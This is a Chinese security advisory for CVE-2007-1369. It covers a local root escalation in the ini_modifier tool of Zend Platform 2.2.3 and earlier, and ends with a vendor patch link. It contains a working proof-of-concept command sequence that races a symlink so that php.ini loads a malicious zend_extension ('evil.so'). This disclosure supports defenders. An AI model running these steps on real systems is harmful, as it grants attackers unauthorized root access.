发布日期：2007-03-03
更新日期：2007-03-15

受影响系统：

Zend Zend Platform <= 2.2.3

不受影响系统：

Zend Zend Platform 3.0

描述：

---

BUGTRAQ  ID: 22802
CVE(CAN) ID: CVE-2007-1369

Zend Platform是企业级PHP应用的运行时平台环境。

Zend Platform软件包的ini_modifier工具在使用上存在漏洞，本地攻击者可能利用此漏洞提升权限。

在安装Zend Platform过程中安装了一个名为ini_modifier的suid组二进制程序。

$ ls -la /usr/local/Zend/sbin/ini_modifier
-rwxr-sr-x  1 root zendtech 243240 2006-08-14 16:24 ini_modifier

这个二进制程序用于从GUI编辑系统范围内的php.ini文件。为了防止滥用ini_modifier，在进行任何编辑之前都会提示GUI口令，但攻击者可以从php.ini读取GUI口令的MD5哈希并使用字典或彩虹表攻击破解，这样无需知道GUI口令便可以编辑php.ini文件，然后通过添加PHP扩展在下一次服务器重启时获得root用户权限。

<*来源：Stefan Esser （s.esser@ematters.de）
  
  链接：http://www.php-security.org/MOPB/BONUS-07-2007.html
        http://www.zend.com/products/zend_platform/security_vulnerabilities
        http://secunia.com/advisories/24501/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

$ cd /tmp

$ mkdir ini
$ cd ini
$ cp /usr/local/Zend/etc/php.ini .
... now edit zend_gui_password in the copy to a MD5 of your choice and
... REMEBER the old MD5
$ cd ..
$ /usr/local/Zend/sbin/ini_modifier -f /tmp/ini/php.ini -n
Password:
(ini_modifier) help
modify entry - Modifies an entry.
switch extension - Enables or disables an extension.
switch zend_extension - Enables or disables a Zend extension.
help - Shows this help.
write - Writes the changes.
quit - Quits the program.
(ini_modifier) switch zend_extension /var/www/upload/evil.so on
(ini_modifier) modify entry Zend zend_gui_password OLDMD5
(ini_modifier)

在平行会话中执行以下操作：

$ cd /tmp
$ mv ini ini.bak
$ ln -s /usr/local/Zend/etc ini

继续编辑ini file文件：

(ini_modifier) write
(ini_modifier) quit

$ cat /usr/local/Zend/etc/php.ini
[PHP]
zend_extension=/var/www/upload/evil.so
...
zend_gui_password=OLDMD5

下一次重启Web服务器时就会加载所注入的恶意Zend Extension并以root用户权限执行。

建议：

---

厂商补丁：

Zend
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.zend.com/downloads

浏览次数：3475
严重程度：0（网友投票）